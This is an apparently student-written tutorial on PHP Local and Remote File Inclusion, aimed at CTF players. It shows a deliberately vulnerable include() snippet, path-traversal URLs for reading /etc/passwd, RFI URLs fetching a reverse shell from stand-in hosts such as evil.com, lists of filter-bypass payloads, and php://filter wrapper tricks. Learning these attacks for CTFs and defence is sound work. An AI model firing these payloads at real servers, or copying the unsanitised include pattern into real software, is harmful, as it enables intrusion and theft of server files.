Pwning PHP Websites: RFI & LFI
PHP is one of the widely used languages for web development (more than 60%) which makes it one of the most targeted ones.
Also, PHP websites are common in CTFs because it is easy to write vulnerable code in PHP.
Local File Inclusion (LFI) exists in websites that don’t have proper sanitization for input, this allows an attacker to include sensitive files on the server.
Remote File Inclusion (RFI) occurs in websites that dynamically reference external files without checking them.
RFI vs LFI:
Remote File Inclusion and Local File Inclusion are not the same. In LFI, the attacker uses a file that is inside the server but in RFI, the attacker uses a file hosted in the attacker’s server.
Why specifically PHP?
PHP is weird. It has a lot of unique features and very dangerous functions thus leading to lots of unique vulnerabilities like type juggling.
<?php
$page = $_GET[‘page’];
if (file_exists($page))
{
include($page);
}
?>
Take a look at this code, we can control the “page” variable by page URL parameter.
https://www.example.com/?page=index.php
What will happen if we request a sensitive file like the passwd file or the shadow file?
As there is no input sanitization we can go up the directories and request those sensitive files without any problem and server with return them:
https://www.example.com/?page=/../../../etc/passwd
In the case of CTFs, we can read the flag file.
Viewing files on the server is a “Local File Inclusion” or LFI.
Now think about what will happen if we give http://www.google.com as input to the page parameter?
https://www.example.com/?page=http://www.google.com
The website will get the google page’s source code and return it (told you PHP is weird). We can exploit this by specifying the input as a malicious file we can execute our own code or get a reverse shell on the server.
https://www.example.com/?page=http://lol.evil.com/revershell.php
Reverse shell: http://pentestmonkey.net/tools/web-shells/php-reverse-shell
Now, let us continue with filter bypass techniques:
LFI:
http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwdRFI:
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txtWrappers:
PHP supports wrappers, you can learn more about it here:
To bypass filters and firewalls we can encode the file in base64 using the wrapper
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.phpAlso, you can get the file as a zip file (how crazy is that?):
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwdResources:
It is hard to write clean code in PHP, and this leads to a lot of human errors thus making the websites vulnerable to these attacks. There are other vulnerabilities that are cooler than RFI&LFI, go explore!!
Спасибо :) — Mudhalai Mr DSC SASTRA deemed university
